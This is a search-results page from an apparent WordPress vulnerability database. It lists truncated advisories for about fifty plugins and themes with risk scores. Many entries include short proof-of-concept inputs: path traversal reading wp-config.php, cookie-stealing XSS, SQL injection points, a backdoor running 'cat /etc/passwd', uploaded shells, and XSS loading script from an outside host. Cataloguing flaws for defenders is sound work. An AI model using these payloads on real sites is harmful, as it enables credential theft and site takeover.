Lucene search
K
WpexploitRecent

4359 matches found

wpexploit
wpexploit
added 2015/03/28 12:0 a.m.18 views

Aspose.Words Exporter < 2.0 - Unauthenticated Arbitrary File Download

The Aspose.Words Exporter WordPress plugin was affected by an Arbitrary File Download security vulnerability. The asposedocexporterdownload.php file of the plugin does not restrict access, check permission or validate the file parameter, allowing unauthenticated user to download any file from the...

3AI score
Exploits0References3
wpexploit
wpexploit
added 2015/03/27 12:0 a.m.10 views

Aspose Cloud eBook Generator - File Download

The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/aspose-cloud-ebook-generator/asposepostsexporterdownload.php?file=../../../wp-config.php...

0.8AI score
Exploits0References1
wpexploit
wpexploit
added 2015/03/25 12:0 a.m.15 views

Ptengine <= 1.0.1 - Reflected Cross-Site Scripting (XSS)

The ptengine-real-time-web-analytics-and-heatmap WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability...

0.5AI score
Exploits0References1
wpexploit
wpexploit
added 2015/03/18 12:0 a.m.17 views

Ajax Search Pro <= 3.5 - Cross-Site Request Forgery (CSRF) Add User

The ajax-search-pro WordPress plugin was affected by a Cross-Site Request Forgery CSRF Add User security vulnerability. This will register an administrator with username "xADMIN" and password "xPASS": POST request to:...

1.8AI score
Exploits0References2
wpexploit
wpexploit
added 2015/03/16 12:0 a.m.16 views

MiwoFTP - File & Folder Manager <= 1.0.4 - Arbitrary File Disclosure

A hook is added to ‘init’ in the file ‘miwoftp/miwoftp.php’. This hook is triggered whenever a user visits the front end of the site. The function specified in this hook will proceed to allow the user to download a file within the scope of the home directory of the site. Various values from the G...

0.1AI score
Exploits0References1
wpexploit
wpexploit
added 2015/03/10 12:0 a.m.18 views

Fraction Theme < 1.1.2 - Privilege Escalation

This vulnerability allows an attacker either authenticated or unauthenticated to escalate privileges on the site and have an admin account which may lead to a full site takeover. This will enable user registration: https://example.com/wp-admin/admin-ajax.php?action=otsaveoptions&userscanregister=...

2.7AI score
Exploits0References3
wpexploit
wpexploit
added 2015/03/02 12:0 a.m.26 views

Photocrati Theme 4.x.x - SQL Injection

http://www.example.com/wp-content/themes/photocrati-theme-path/ecomm-sizes.php?prodid=SQL...

7.5CVSS1.5AI score0.04737EPSS
Exploits2References3
wpexploit
wpexploit
added 2015/02/22 12:0 a.m.10 views

Quasar Theme Rock Form Builder plugin - Privilege Escalation

The Rock Form Builder plugin 1.0 is used within the Quasar WooCommerce theme 1.9.1. Authenticated users can modify WordPress settings which can lead to full site compromise. It's unclear which exact version of the rock-form-builder fixed the issue, but it was something in between 1.0 and 2.5, so...

7AI score
Exploits0References3
wpexploit
wpexploit
added 2015/02/11 12:0 a.m.15 views

WordPress Uninstall <= 1.1 - WordPress Deletion via CSRF

Any registered user can delete all WordPress database tables and files. This request makes it possible: http://wp.dev/wp-admin/admin-ajax.php?action=uninstall...

5.8CVSS1.1AI score0.0061EPSS
Exploits1
wpexploit
wpexploit
added 2015/02/11 12:0 a.m.25 views

Wordpress Video Gallery <= 2.7 - SQL Injection

The contus-video-gallery WordPress plugin was affected by a SQL Injection security vulnerability. http://example.com/wp-admin/admin-ajax.php?action=rss&type=video&vid=SQLi...

7.5CVSS1.7AI score0.4107EPSS
Exploits4References2
wpexploit
wpexploit
added 2015/01/29 12:0 a.m.20 views

PowerPress Podcasting < 6.0.1 - Cross-Site Scripting (XSS)

The PowerPress Podcasting plugin by Blubrry WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. /wp-admin/admin.php?page=powerpress/powerpressadmincategoryfeeds.php&action=powerpress-editcategoryfeed&cat=1';"--alert0x014068...

4.3CVSS1AI score0.02237EPSS
Exploits3References1
wpexploit
wpexploit
added 2015/01/29 12:0 a.m.14 views

WPtouch <= 3.6.6 - Unvalidated Open Redirect

The WPtouch WordPress plugin was affected by an Unvalidated Open Redirect security vulnerability. http://www.example.com/?wptouchswitch=mobile&redirect=http%3A%2F%2Fdomain.com...

1.1AI score
Exploits0References1
wpexploit
wpexploit
added 2015/01/28 12:0 a.m.34 views

Photo Gallery <= 1.2.8 - Multiple Authenticated Reflected XSS

The Photo Gallery by 10Web – Mobile-Friendly Image Gallery WordPress plugin was affected by a Multiple Authenticated Reflected XSS security vulnerability. /wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg,jpeg,png,gif&callback=bwgaddpreviewimage&sortby=name";alert1...

3.5CVSS1.8AI score0.02331EPSS
Exploits4References1
wpexploit
wpexploit
added 2015/01/15 6:3 p.m.9 views

Feedweb 2.4.1-3.0.6 - SQL Injection

The feedweb WordPress plugin was affected by a SQL Injection security vulnerability. http://www.example.com/wp-content/plugins/feedweb/widgetcontainer.php?pid= Inject here &ishp=true...

1.8AI score
Exploits0References1
wpexploit
wpexploit
added 2015/01/15 10:8 a.m.9 views

GI-Media Library <= 2.2.2 - Arbitrary File Download

The gi-media-library WordPress plugin was affected by an Arbitrary File Download security vulnerability. /wp-content/plugins/gi-media-library/download.php?fileid=Li4vLi4vLi4vd3AtY29uZmlnLnBocA== Where "Li4vLi4vLi4vd3AtY29uZmlnLnBocA==" is "../../../wp-config.php" Base64 encoded...

2.4AI score
Exploits0References2
wpexploit
wpexploit
added 2014/12/27 12:0 a.m.11 views

Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)

The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://localhost:8080/?pageid=0&&errorsfu-disallowed-mime-type0name=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E...

4.3CVSS0.9AI score0.06701EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/12/15 12:0 a.m.10 views

SEO Redirection < 2.3 - Unauthenticated Stored Cross-Site Scripting (XSS)

The plugin did not sanitise the referer link from requests before displaying them in the 'Settings SEO Redirection Redirection History' page. This result in a Store dCross-Site Scripting XSS issue This cURL request to a redirected page with a custom referer makes it possible: curl -H 'Referer:...

6.4AI score
Exploits0
wpexploit
wpexploit
added 2014/12/07 12:0 a.m.21 views

ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)

The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. http://www.example.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php...

0.8AI score
Exploits0References2
wpexploit
wpexploit
added 2014/12/02 12:0 a.m.11 views

Wordpress CodeArt Google MP3 Player - File Disclosure

The google-mp3-audio-player WordPress plugin was affected by a File Disclosure security vulnerability. http://www.example.com/wp-content/plugins/google-mp3-audio-player/directdownload.php?file=../../../wp-config.php...

0.9AI score
Exploits0References1
wpexploit
wpexploit
added 2014/11/20 7:52 p.m.37 views

WordPress 3.0-3.9.2 - Unauthenticated Stored Cross-Site Scripting (XSS)

" onmouseover="alert'hello';"...

4.3CVSS1AI score0.04978EPSS
Exploits1References3
wpexploit
wpexploit
added 2014/11/20 12:0 a.m.29 views

CM Download Manager <= 2.0.0 - Unauthenticated Code Injection

The plugin does not validate and sanitise the CMDsearch parameter which used to create a custom function. This allows attacker to run arbitrary command on the remote server GET /cmdownloads/?CMDsearch=".phpinfo." HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Windows NT 6.3; WOW64; rv:33.0...

10CVSS2.3AI score0.14804EPSS
Exploits6References3
wpexploit
wpexploit
added 2014/09/29 12:0 a.m.13 views

Category Page Icons <= 0.9.1 - Arbitrary File Upload/Deletion via Path Traversal

v0.9.2 added a check to not allow direct access to the affected file. However the path traversal was not fixed Plugin has been closed from repository. Choose File to upload : Directory :...

7.2AI score
Exploits0References1
wpexploit
wpexploit
added 2014/09/28 12:0 a.m.10 views

NativeChurch Theme - Arbitrary File Download

Description The NativeChurch WordPress theme was affected by an Arbitrary File Download security vulnerability. https://example.com/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php...

7.2AI score
Exploits0References3
wpexploit
wpexploit
added 2014/08/27 12:0 a.m.12 views

WordPress 3.5-3.7.1 - XML-RPC Denial of Service

…...

7.1AI score
Exploits0References3
wpexploit
wpexploit
added 2014/08/24 12:0 a.m.12 views

KenBurner Slider - Unauthenticated Arbitrary File Download

The WordPress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability, which could allow an attacker to download the wp-config.php file and others. This issue has been spotted being exploited in the wild...

6.9AI score
Exploits0References2
wpexploit
wpexploit
added 2014/08/01 10:58 a.m.10 views

wp-FileManager <= 1.3.0 - File Download

The wp-filemanager WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download...

1.4AI score
Exploits0References1
wpexploit
wpexploit
added 2014/08/01 10:58 a.m.19 views

WordPress 2.1.1 - Command Execution Backdoor

http://www.example.com/wp-includes/feed.php?ix=phpinfo; http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd...

7.5CVSS2.2AI score0.27006EPSS
Exploits2References3
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.8 views

Real Estate by Templatic - CSRF File Upload

Description The realestate WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/Realestate/images/tmp/yourshell.php...

7.4AI score
Exploits0References1
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.16 views

Specialist by Templatic - CSRF File Upload

The specialist WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/specialist/images/tmp/yourshell.php...

0.1AI score
Exploits0References1
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.20 views

slidedeck2 < 2.1.20130313 - XSS in ZeroClipboard

The SlideDeck 2 Lite Responsive Content Slider WordPress plugin was affected by a XSS in ZeroClipboard security vulnerability. /wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id="catcheif!self.aself.a=!alertdocument.cookie//&width&height...

4.3CVSS0.8AI score0.06316EPSS
Exploits4References2
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.12 views

BSK PDF Manager < 2.9.1 - Authenticated Stored Cross-Site Scripting (XSS)

The plugin does not sanitise the view and cattitle POST parameter when creating or editing a category /wp-admin/admin.php?page=bsk-pdf-manager, allowing authenticated users with a role as low as editor to set an XSS payload which will be triggered in the Categories list...

0.8AI score
Exploits0References1
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.14 views

5star by Templatic - CSRF File Upload

Description The 5star WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/5star/images/tmp/yourshell.php...

7.4AI score
Exploits0References1
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.16 views

BSK PDF Manager < 1.5 - Multiple Authenticated SQL Injections

The plugin did not use prepared statement with the categoryid and pdfid parameter when viewing the /wp-admin/admin.php?page=bsk-pdf-manager and /wp-admin/admin.php?page=bsk-pdf-manager-pdfs page leading to Authenticated SQL Injection issues...

6.5CVSS2.2AI score0.03553EPSS
Exploits3References2
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.11 views

Dailydeal by Templatic - CSRF File Upload

The dailydeal WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/dailydeal/images/tmp/yourshell.php...

0.1AI score
Exploits0References1
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.11 views

Nightlife by Templatic - CSRF File Upload

The nightlife WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/nightlife/images/tmp/yourshell.php...

7.5AI score
Exploits0References1
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.14 views

Video Posts Webcam Recorder < 1.55.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The Video Posts Webcam Recorder WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. https://example.com/wp-content/plugins/video-posts-webcam-recorder/posts/videowhisper/rlogout.php?message=message'//...

4.3CVSS1.4AI score0.01618EPSS
Exploits2References2
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.15 views

Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php Local File Inclusion

The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php...

1.2AI score
Exploits0References3
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.21 views

Tera Charts 0.1 - Unauthenticated Remote Path Traversal File Disclosure

The tera-charts WordPress plugin was affected by an Unauthenticated Remote Path Traversal File Disclosure security vulnerability. http://www.example.com/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php...

5CVSS2.1AI score0.18734EPSS
Exploits2References2
wpexploit
wpexploit
added 2014/06/12 12:0 a.m.25 views

Ruven Toolkit <= 1.1 - tinymce/popup.php popup Parameter Reflected XSS

The ruven-toolkit WordPress plugin was affected by a tinymce/popup.php popup Parameter Reflected XSS security vulnerability. http://localhost/wp-content/plugins/ruven-toolkit/tinymce/popup.php?popup=popup'alertdocument.cookie&...

4.3CVSS1AI score0.01163EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/05/28 12:0 a.m.15 views

WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS

The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?apiurl=apiurl%27%3E%3Cscript%3Ealert%284%29%3C/script%3E...

4.3CVSS1.8AI score0.04055EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/05/07 12:0 a.m.11 views

Prostore < 1.1.3 - Open Redirection

The prostore WordPress theme was affected by an Open Redirection security vulnerability. /wp-content/themes/prostore/go.php?https://example.com...

1.3AI score
Exploits0References2
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.18 views

Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...

4.3CVSS1.9AI score0.03983EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.34 views

Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E...

4.3CVSS1.4AI score0.03983EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.15 views

Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS

The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpiedebug.php?url=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E...

4.3CVSS1.8AI score0.03686EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.19 views

Podcast Channels < 0.28 - Unauthenticated Reflected XSS

The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. http://127.0.0.1/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...

4.3CVSS2AI score0.03779EPSS
Exploits1References1
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.20 views

Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS

The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability...

4.3CVSS2.1AI score0.03902EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.17 views

WP Planet <= 0.1 - Unauthenticated Reflected XSS

The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/wp–planet/rss.class/scripts/magpiedebug.php?url=alert1...

4.3CVSS1.1AI score0.03884EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.18 views

Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...

4.3CVSS1.1AI score0.00939EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.20 views

Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS

The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E...

4.3CVSS1.9AI score0.03884EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.19 views

WP e-Commerce Swipe <= 3.1.0 - Multiple XSS Issues

The last time it was checked the plugin was still affected and had been closed...

4.3CVSS1.5AI score0.01163EPSS
Exploits2References1
Total number of security vulnerabilities4359